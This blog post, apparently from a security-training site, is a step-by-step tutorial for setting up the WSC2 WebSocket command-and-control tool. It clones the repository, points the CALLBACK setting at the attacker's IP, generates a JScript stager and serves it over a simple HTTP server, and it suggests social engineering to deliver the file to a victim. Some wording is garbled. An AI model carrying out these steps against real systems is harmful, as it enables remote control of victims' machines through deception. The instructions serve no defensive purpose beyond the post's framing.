| Blog ,Members Only

Introduction

WSC2 is a PoC of using the WebSockets and a browser process to serve as a C2 communication channel between an agent, running on the target system, and a controller acting as the actuel C2 server.

Installation

we clear the repository with the following command

$ git clone https://github.com/Arno0x/WSC2.git

we access the folder and list to see what it has

$ cd WSC2/
$ ls

we install the requirements remember that before you create a virtaul environment with virtualenv

$ pip install -r requirements.txt

we modified the following file, you can do it with nano in this case we did it with vim. We edit the variable CALLBACK, we write our IP bone that of the attacking machine.

$ vim config.py

then we write the following command and press enter.

$ ./wsc2.py

We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in jscript1, jscript2, jscript3. We are using jscript1 here because it is not required to compile. The rest of the stagers are required to compile. This command will create a wsc2Agent1.js in stagers directory.

$ genStager jscript1

We open a new terminal and enter the next location.

$ cd WSC2/

then we enter the next folder.

$ cd stagers/
$ python -m SimpleHTTPServer 80

This would be the way you would see entering from another machine, you can also use social engineering to get this file to your victim.

Resources:

github.com/Arno0x/WSC2

If you are interested in learning more, we invite you to review this course.

Python For InfoSec Professionals

Try Certified Ethical Hacker for FREE!!!